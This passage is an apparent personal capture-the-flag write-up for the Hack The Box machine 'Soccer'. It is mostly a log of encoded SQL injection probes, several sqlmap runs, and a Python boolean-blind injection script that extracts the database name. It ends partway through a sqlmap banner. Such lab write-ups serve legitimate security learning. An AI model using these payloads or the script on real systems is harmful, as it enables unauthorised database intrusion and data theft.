127.0.0.1 - - [05/Mar/2023 11:40:10] "GET /?id=%28SELECT%20%28CASE%20WHEN%20%281185%3D6285%29%20THEN%201%20ELSE%20%28SELECT%206285%20UNION%20SELECT%206895%29%20END%29%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:15] "GET /?id=1%29%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29%20AND%20%286667%3D6667 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:21] "GET /?id=1%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:31] "GET /?id=1%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29--%20VmOL HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:36] "GET /?id=1%27%29%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29%20AND%20%28%27vgZl%27%3D%27vgZl HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:43] "GET /?id=1%27%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29%20AND%20%27FMfq%27%3D%27FMfq HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:50] "GET /?id=1%29%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%284381%3D4381 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:54] "GET /?id=1%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:00] "GET /?id=1%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20pXHb HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:08] "GET /?id=1%27%29%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27CJRP%27%3D%27CJRP HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:13] "GET /?id=1%27%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27Jjgq%27%3D%27Jjgq HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:18] "GET /?id=1%29%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%287785%3D7785 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:21] "GET /?id=1%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:25] "GET /?id=1%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29--%20nGvp HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:29] "GET /?id=1%27%29%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%28%27fmfX%27%3D%27fmfX HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:32] "GET /?id=1%27%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%27wOSp%27%3D%27wOSp HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:35] "GET /?id=1%29%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%288326%3D8326 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:44] "GET /?id=1%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:49] "GET /?id=1%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20iGwg HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:53] "GET /?id=1%27%29%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27XKdT%27%3D%27XKdT HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:58] "GET /?id=1%27%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27QHru%27%3D%27QHru HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:04] "GET /?id=%28SELECT%20CONCAT%28CONCAT%28%27qkbzq%27%2C%28CASE%20WHEN%20%288028%3D8028%29%20THEN%20%271%27%20ELSE%20%270%27%20END%29%29%2C%27qqjjq%27%29%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:09] "GET /?id=1 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:13] "GET /?id=1%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:22] "GET /?id=1%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:28] "GET /?id=1%27%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:32] "GET /?id=1%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:36] "GET /?id=1%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:40] "GET /?id=1%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:44] "GET /?id=1%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:49] "GET /?id=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:58] "GET /?id=1%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:04] "GET /?id=1%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:09] "GET /?id=1%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:16] "GET /?id=1%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:20] "GET /?id=1%29%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29%20AND%20%284161%3D4161 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:30] "GET /?id=1%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:39] "GET /?id=1%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29--%20pyzB HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:47] "GET /?id=1%27%29%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29%20AND%20%28%27awGX%27%3D%27awGX HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:51] "GET /?id=1%27%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29%20AND%20%27MsuW%27%3D%27MsuW HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:54] "GET /?id=1%29%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29%20AND%20%283450%3D3450 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:58] "GET /?id=1%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:05] "GET /?id=1%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29--%20aLXw HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:09] "GET /?id=1%27%29%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27pHJg%27%3D%27pHJg HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:13] "GET /?id=1%27%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29%20AND%20%27sugF%27%3D%27sugF HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:17] "GET /?id=1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%282874%3D2874 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:21] "GET /?id=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:25] "GET /?id=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20LcPO HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:29] "GET /?id=1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%28%27Fvna%27%3D%27Fvna HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:33] "GET /?id=1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27AxHq%27%3D%27AxHq HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:37] "GET /?id=1%29%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29%20AND%20%283643%3D3643 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:44] "GET /?id=1%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:48] "GET /?id=1%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29--%20uMol HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:52] "GET /?id=1%27%29%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29%20AND%20%28%27GqHt%27%3D%27GqHt HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:56] "GET /?id=1%27%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29%20AND%20%27vniL%27%3D%27vniL HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:46:18] "GET /?id=1%29%20ORDER%20BY%201--%20eAYw HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:46:23] "GET /?id=1%29%20ORDER%20BY%204299--%20HCGh HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:46:35] "GET /?id=1%20ORDER%20BY%201--%20uOLG HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:46:58] "GET /?id=1%20ORDER%20BY%205403--%20kRXS HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:47:12] "GET /?id=1%20ORDER%20BY%201--%20viPb HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:47:24] "GET /?id=1%20ORDER%20BY%201950--%20hLcp HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:47:28] "GET /?id=1%27%29%20ORDER%20BY%201--%20CevJ HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:47:32] "GET /?id=1%27%29%20ORDER%20BY%204026--%20LUYc HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:47:36] "GET /?id=1%27%20ORDER%20BY%201--%20SMzk HTTP/1.1" 200 -




try op by hand

https://app.hackthebox.com/machines/Soccer_第19张图片

https://app.hackthebox.com/machines/Soccer_第20张图片

for this i try sqlmap manymany times,but i can’t get the data

┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1  -p id --technique=B
        ___
       __H__                                                                                                                                                                    
 ___ ___[.]_____ ___ ___  {1.7.2#stable}                                                                                                                                        
|_ -| . [.]     | .'| . |                                                                                                                                                       
|___|_  [)]_|_|_|__,|  _|                                                                                                                                                       
      |_|V...       |_|   https://sqlmap.org                                                                                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:49:15 /2023-03-19/

[12:49:15] [INFO] testing connection to the target URL
[12:49:20] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
[12:49:20] [INFO] testing if the target URL content is stable
[12:49:24] [INFO] target URL content is stable
[12:49:27] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[12:49:30] [INFO] testing for SQL injection on GET parameter 'id'
[12:49:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:49:50] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:49:53] [WARNING] GET parameter 'id' does not seem to be injectable
[12:49:53] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'                                                                                                                           

[*] ending @ 12:49:53 /2023-03-19/

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1  -p id --technique=B --level 5
        ___
       __H__                                                                                                                                                                    
 ___ ___[,]_____ ___ ___  {1.7.2#stable}                                                                                                                                        
|_ -| . [']     | .'| . |                                                                                                                                                       
|___|_  [']_|_|_|__,|  _|                                                                                                                                                       
      |_|V...       |_|   https://sqlmap.org                                                                                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:50:02 /2023-03-19/

[12:50:02] [INFO] testing connection to the target URL
[12:50:05] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
[12:50:05] [INFO] testing if the target URL content is stable
[12:50:08] [INFO] target URL content is stable
[12:50:12] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[12:50:15] [INFO] testing for SQL injection on GET parameter 'id'
[12:50:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:50:41] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] quit
[12:50:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[12:50:50] [WARNING] user aborted during detection phase
quit
[12:50:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[12:50:59] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] quit
[12:51:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:51:02] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] S
[12:51:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[12:51:05] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] 
[12:51:06] [ERROR] user quit

[*] ending @ 12:51:06 /2023-03-19

so i try python bool blind injection

# -*- coding: utf-8 -*-

import requests
import string

url = "http://localhost:8081?id=1"
#mark = "Ticket Exists"
notmark="Doesn't"
mark="Ticket Exists"

database = ''
for i in range(1, 25):
    for j in string.ascii_letters:
        target = url + ' '+' or if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))  --;' % (i, j)
        r = requests.get(target)
        if notmark not in r.text:
            database += j
            print(database)
            print(r.text)
            break
print('Database:', database)
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ python3 bool4soc\ copy.py                       1 ⨯
s
Ticket Exists
so
Ticket Exists
soc
Ticket Exists
socc
Ticket Exists
socce
Ticket Exists
soccer
Ticket Exists
soccerd
Ticket Exists
soccerdb
Ticket Exists



These results make me confident that i can sqlmap it

so i try the command

┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1  -p id --technique=B --risk 3 --string="Ticket Exists"
        ___
       __H__                                                                                                                                                                    
 ___ ___[,]_____ ___ ___  {1.7.2#stable}                                                                                                                                        
|_ -| . [,]     | .'| . |                                                                                                                                                       
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                       
      |_|V...       |_|   https://sqlmap.org                                                                                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:24:33 /2023-03-19/

[13:24:33] [INFO] testing connection to the target URL
[13:24:39] [INFO] testing if the provided string is within the target URL page content
[13:24:39] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[13:24:39] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
[13:24:43] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[13:24:46] [INFO] testing for SQL injection on GET parameter 'id'
[13:24:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:25:24] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[13:25:47] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable 
[13:27:11] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] n
[13:35:36] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[13:35:36] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6478 OR 1585=1585
---
[13:36:30] [INFO] testing MySQL
[13:36:36] [INFO] confirming MySQL
[13:36:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 8.0.0
[13:37:00] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'

[*] ending @ 13:37:00 /2023-03-19/

continue to try it is too slow

https://app.hackthebox.com/machines/Soccer_第21张图片

                                                                                                                                                                                

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1  -p id --technique=B --risk 3 --string="Ticket Exists"
        ___
       __H__                                                                                                                                                                    
 ___ ___[,]_____ ___ ___  {1.7.2#stable}                                                                                                                                        
|_ -| . [,]     | .'| . |                                                                                                                                                       
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                       
      |_|V...       |_|   https://sqlmap.org                                                                                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:24:33 /2023-03-19/

[13:24:33] [INFO] testing connection to the target URL
[13:24:39] [INFO] testing if the provided string is within the target URL page content
[13:24:39] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[13:24:39] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
[13:24:43] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[13:24:46] [INFO] testing for SQL injection on GET parameter 'id'
[13:24:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:25:24] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[13:25:47] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable 
[13:27:11] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] n
[13:35:36] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[13:35:36] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6478 OR 1585=1585
---
[13:36:30] [INFO] testing MySQL
[13:36:36] [INFO] confirming MySQL
[13:36:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 8.0.0
[13:37:00] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'

[*] ending @ 13:37:00 /2023-03-19/

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1  -p id --technique=B --risk 3 --string="Ticket Exists" --dbs
        ___
       __H__                                                                                                                                                                    
 ___ ___[,]_____ ___ ___  {1.7.2#stable}                                                                                                                                        
|_ -| . [']     | .'| . |                                                                                                                                                       
